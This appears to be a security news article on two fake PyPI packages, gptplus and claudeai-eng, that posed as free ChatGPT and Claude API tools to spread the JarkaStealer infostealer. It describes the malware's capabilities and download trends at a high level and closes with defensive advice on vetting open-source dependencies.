A new attack involving two malicious Python packages, gptplus and claudeai-eng, has been uncovered, delivering the JarkaStealer malware to thousands of victims. These packages, which masquerade as free tools for accessing the APIs of OpenAIโs ChatGPT and Anthropicโs Claude platforms, have raised alarms about the vulnerabilities inherent in open-source ecosystems. If youโve ever searched for a quick and free way to integrate AI APIs into your projects, you could easily fall victim to these fake ChatGPT and Claude API packages.
The GenAI Gold Rush
Generative AI tools like ChatGPT and Claude have revolutionized how we approach coding, content creation, and problem-solving. By offering unprecedented capabilities in natural language understanding and generation, theyโve attracted millions of developers seeking to integrate their functionalities into applications.
However, access to premium features of these platforms often requires payment, creating an opportunity for malicious actors. Attackers prey on developers who are eager to bypass these paywalls, offering seemingly legitimate free alternatives.
The fake ChatGPT and Claude API packages, gptplus and claudeai-eng, exemplify this strategy. Claiming to provide API access to GPT-4 Turbo and Claude, these packages promised developers a shortcut to harnessing GenAIโs power. Instead, they delivered malware hidden in plain sight.
The Mechanics of Deception
What makes the gptplus and claudeai-eng attack notable is its subtlety. Both packages were designed to look and feel legitimate:
- Functionality Mimicry: Once installed, the packages provided limited interaction with ChatGPTโs demo version, giving the appearance of working as advertised.
- Illusion of Legitimacy: The attackers committed extra effort to ensure the packages looked functional, reducing suspicion among users.
However, beneath this faรงade lay a darker reality. The packages were programmed to deploy a Java archive (JAR) file containing JarkaStealer, a malicious infostealer.
What is JarkaStealer?
JarkaStealer is a low-cost but effective malware sold on the Russian-language Dark Web for as little as $20. While its source code is freely available on GitHub, many attackers opt to buy pre-configured versions, along with modifications ranging from $3 to $10.
Capabilities of JarkaStealer:
- Data Exfiltration: Extracts sensitive information, including saved passwords, cookies, and autofill data from browsers.
- Session Hijacking: Captures tokens from widely used apps such as Telegram, Discord, and Steam.
- Surveillance: Takes screenshots of the victimโs desktop to gather additional context about their activities.
- Cross-Platform Impact: Targets both Windows and Linux systems, increasing its reach.
While JarkaStealer isnโt the most sophisticated infostealer, its affordability and availability make it a popular choice for cybercriminals. In this case, the attackers leveraged the hype around GenAI to distribute the malware to unsuspecting developers.
A Year of Stealthy Deception
The fake ChatGPT and Claude API packages remained undetected on PyPI, the official repository for Python packages, for an entire year. During this time, they were downloaded over 1,700 times across more than 30 countries, including the United States, exposing thousands of developers to potential data theft.
Interestingly, download analytics from the PyPI tracking tool ClickPy reveal some peculiar trends:
- The gptplus package experienced a surge in downloads on its first day, likely due to artificial inflation by the attackers. This tactic aimed to create a false sense of legitimacy, as developers often equate high download numbers with trustworthiness.
- The claudeai-eng package saw more organic growth, particularly during February and March, indicating genuine interest from developers.
These patterns highlight how attackers strategically manipulate perceptions to exploit trust in open-source ecosystems.
This incident underscores critical challenges in securing open-source platforms. As organizations increasingly rely on open-source software, attackers are exploiting this trust to distribute malware. Cybersecurity professionals must take proactive measures to mitigate such risks.
Protecting Yourself from Fake ChatGPT and Claude API Packages
- Always verify the legitimacy of open-source packages before downloading. Check for reputable authors, a history of updates, and community reviews. Suspicious packages often lack these markers.
- Tools like Sonatype Nexus, Snyk, and Dependabot can detect malicious or vulnerable dependencies, reducing the risk of compromise.
- Developers are often the first line of defense. Conduct regular training on recognizing red flags, such as unusual package names, vague descriptions, or newly published packages with limited documentation.
- Adopt a zero-trust approach to supply chain security. Ensure continuous monitoring of software dependencies and maintain a comprehensive bill of materials (SBOM) for all projects.
- Encourage teams to stay updated on security advisories related to PyPI and other repositories. Tools like PyPIโs RSS feeds or community forums can provide timely updates on emerging threats.
Conclusion:
As George Apostopoulos from Endor Labs aptly puts it, โAI is very hot, but many services require you to pay. People that donโt know better will fall for this.โ
The fake ChatGPT and Claude API packages, gptplus and claudeai-eng, are just the tip of the iceberg in a growing wave of attacks targeting GenAI users. For developers, organizations, and cybersecurity professionals alike, the takeaway is clear: proactive vigilance is the best defense.
By fostering a culture of security awareness, implementing robust safeguards, and staying informed about emerging threats, we can ensure that the promise of generative AI is not overshadowed by exploitation. The next time you encounter a โtoo-good-to-be-trueโ tool, think twice, because free might just cost you more than you can afford.